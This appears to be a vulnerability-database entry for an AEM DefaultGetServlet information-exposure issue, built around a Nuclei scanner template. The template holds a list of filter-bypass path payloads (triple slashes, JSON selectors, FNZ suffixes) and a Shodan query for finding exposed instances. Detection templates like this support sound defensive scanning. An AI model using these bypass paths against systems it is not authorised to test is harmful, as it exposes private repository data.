aem-default-get-servlet: AEM DefaultGetServlet

日期: 2025-08-01 | 影响软件: aem-default-get-servlet | POC: 已公开

漏洞描述

Sensitive information might be exposed via AEM DefaultGetServlet.

PoC代码[已公开]

# Nuclei template: checks whether AEM's DefaultGetServlet serialises repository
# nodes as JSON for an unauthenticated GET (read-only misconfiguration probe).
id: aem-default-get-servlet

info:
  name: AEM DefaultGetServlet
  author: DhiyaneshDk
  severity: low
  description: Sensitive information might be exposed via AEM DefaultGetServlet.
  reference:
    - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43
    - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/GetServletExposed.java
  classification:
    cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
  metadata:
    # One request per entry in `payloads.paths` below (64 entries); keep this
    # count in sync if that list changes.
    max-request: 64
    vendor: adobe
    product: experience_manager
    shodan-query: http.component:"Adobe Experience Manager"
  tags: aem,adobe,misconfig,vuln

http:
  - method: GET
    path:
      # {{paths}} is filled from the payload list; quoted so the leading braces
      # are not parsed as a YAML flow mapping before nuclei sees them.
      - "{{BaseURL}}{{paths}}"

    # Variants of the same four repository roots (/etc, /var, /apps, /home):
    # plain, triple-slash prefixed, JSON selector forms (.json, .1.json,
    # .children.json, ...) and FNZ.<ext> query/suffix forms. A match on any of
    # them indicates the same underlying exposure, so the remediation is the
    # same: deny these request shapes in front of AEM. NOTE(review): Adobe's
    # Dispatcher security checklist is the usual reference for those filter
    # rules — confirm the deployed rules against it.
    payloads:
      paths:
        - "/etc"
        - "/var"
        - "/apps"
        - "/home"
        - "///etc"
        - "///var"
        - "///apps"
        - "///home"
        - "/.json"
        - "/.1.json"
        - "/....4.2.1....json"
        - "/.json?FNZ.css"
        - "/.json?FNZ.ico"
        - "/.json?FNZ.html"
        - "/.json/FNZ.css"
        - "/.json/FNZ.html"
        - "/.json/FNZ.png"
        - "/.json/FNZ.ico"
        - "/.children.1.json"
        - "/.children....4.2.1....json"
        - "/.children.json?FNZ.css"
        - "/.children.json?FNZ.ico"
        - "/.children.json?FNZ.html"
        - "/.children.json/FNZ.css"
        - "/.children.json/FNZ.html"
        - "/.children.json/FNZ.png"
        - "/.children.json/FNZ.ico"
        - "/etc.json"
        - "/etc.1.json"
        - "/etc....4.2.1....json"
        - "/etc.json?FNZ.css"
        - "/etc.json?FNZ.ico"
        - "/etc.json?FNZ.html"
        - "/etc.json/FNZ.css"
        - "/etc.json/FNZ.html"
        - "/etc.json/FNZ.ico"
        - "/etc.children.json"
        - "/etc.children.1.json"
        - "/etc.children....4.2.1....json"
        - "/etc.children.json?FNZ.css"
        - "/etc.children.json?FNZ.ico"
        - "/etc.children.json?FNZ.html"
        - "/etc.children.json/FNZ.css"
        - "/etc.children.json/FNZ.html"
        - "/etc.children.json/FNZ.png"
        - "/etc.children.json/FNZ.ico"
        - "///etc.json"
        - "///etc.1.json"
        - "///etc....4.2.1....json"
        - "///etc.json?FNZ.css"
        - "///etc.json?FNZ.ico"
        - "///etc.json/FNZ.html"
        - "///etc.json/FNZ.png"
        - "///etc.json/FNZ.ico"
        - "///etc.children.json"
        - "///etc.children.1.json"
        - "///etc.children....4.2.1....json"
        - "///etc.children.json?FNZ.css"
        - "///etc.children.json?FNZ.ico"
        - "///etc.children.json?FNZ.html"
        - "///etc.children.json/FNZ.css"
        - "///etc.children.json/FNZ.html"
        - "///etc.children.json/FNZ.png"
        - "///etc.children.json/FNZ.ico"
    # One hit is enough to establish the exposure; the remaining variants are
    # not sent, which also keeps scan noise down.
    stop-at-first-match: true

    # Both matchers must pass: a 200 on its own is not a finding, since many
    # of these paths return 200 with non-repository content.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      # `jcr:createdBy` is a JCR node property; seeing it in the body shows
      # repository node data is being serialised to the caller.
      - type: word
        words:
          - 'jcr:createdBy'
        # Redundant with a single-entry `words` list (and/or are equivalent);
        # harmless.
        condition: and
# NOTE(review): the digest trailer below is a signature over the template
# body; any edit to this file, comments included, presumably invalidates it
# until the template is re-signed — confirm with the nuclei signing workflow.
# digest: 4a0a00473045022100e5273e0c26aea46b61c2c741da70ae92bd5929568ba31d12eb9719325f91bf6202203f00a53dd09bee8eb3403cf692f7a88c22abd94113a4dda6e65a4d9ebdd21969:922c64590222798bb761d5b6d8e72950